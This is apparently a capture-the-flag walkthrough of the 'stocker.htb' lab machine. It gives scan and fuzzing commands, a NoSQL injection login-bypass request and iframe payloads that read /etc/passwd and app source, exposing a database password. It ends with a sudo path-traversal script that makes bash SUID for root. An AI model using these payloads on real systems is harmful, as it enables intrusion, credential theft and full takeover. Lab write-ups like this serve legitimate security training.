Scanning
> TARGET=10.10.11.196 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Domain:
stocker.htb - dirsearch
> dirsearch -u http://stocker.htb/
[20:07:21] 301 - 178B - /js -> http://stocker.htb/js/
[20:07:43] 301 - 178B - /css -> http://stocker.htb/css/
[20:07:47] 200 - 1KB - /favicon.ico
[20:07:48] 301 - 178B - /fonts -> http://stocker.htb/fonts/
[20:07:51] 301 - 178B - /img -> http://stocker.htb/img/
[20:07:51] 200 - 15KB - /index.html
[20:07:53] 403 - 564B - /js/
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://stocker.htb/" -H "Host: FUZZ.stocker.htb" --hh 178
000000019: 302 0 L 4 W 28 Ch "dev"
dev.stocker.htb
- From cookie:
connect.sid, backend uses nodejs - dirsearch
> dirsearch -u http://dev.stocker.htb/
[20:15:09] 200 - 3KB - /login
[20:15:09] 200 - 3KB - /login/
[20:15:10] 302 - 28B - /logout -> /login
[20:15:10] 302 - 28B - /logout/ -> /login
[20:15:30] 301 - 179B - /static -> /static/
- There is a login page at
/login, can try nosql bypass, change Content-Type and payload
POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 27
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid=s%3AwgQp6npwjmE_RXpdT1CXYslntG-vy_zf.KjRNE5lJGDKFUv0mDK1A7Iryma2cm5yYJLN5kUpdDVE
Upgrade-Insecure-Requests: 1
{"username": {"$ne": null}, "password": {"$ne": null} }
- This brings us to
http://dev.stocker.htb/stock
user
- Add something into the chart and intercept the traffic to exploit the
title field using xss and local origin - Leak the info in
/etc/passwd
payload: <iframe src=file:///etc/passwd height='800' width='800'></iframe>
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
- Leak the information in
/var/www/dev/index.js
payload: <iframe src=file:///var/www/dev/index.js height='800' width='800'></iframe>
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1"
- login as
angoose to get the flag
root
angoose@stocker:~$ sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User angoose may run the following commands on stocker:
(ALL) /usr/bin/node /usr/local/scripts/*.js
- Create exploit script at
/usr/local/scripts/evil.js
const { exec } = require("child_process");
exec("chmod +s /usr/bin/bash", (error, stdout, stderr) => {
if (error) {
console.log(`error: ${error.message}`);
return;
}
if (stderr) {
console.log(`stderr: ${stderr}`);
return;
}
console.log(`stdout: ${stdout}`);
});
- Run the script as sudo and get the root flag
angoose@stocker:~$ touch evil.js
angoose@stocker:~$ vi evil.js
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/evil.js
stdout:
angoose@stocker:~$ ls -ls /usr/bin/bash
1156 -rwsr-sr-x 1 root root 1183448 Apr 18 2022 /usr/bin/bash
angoose@stocker:~$ /usr/bin/bash -p
bash-5.0# cat /root/root.txt
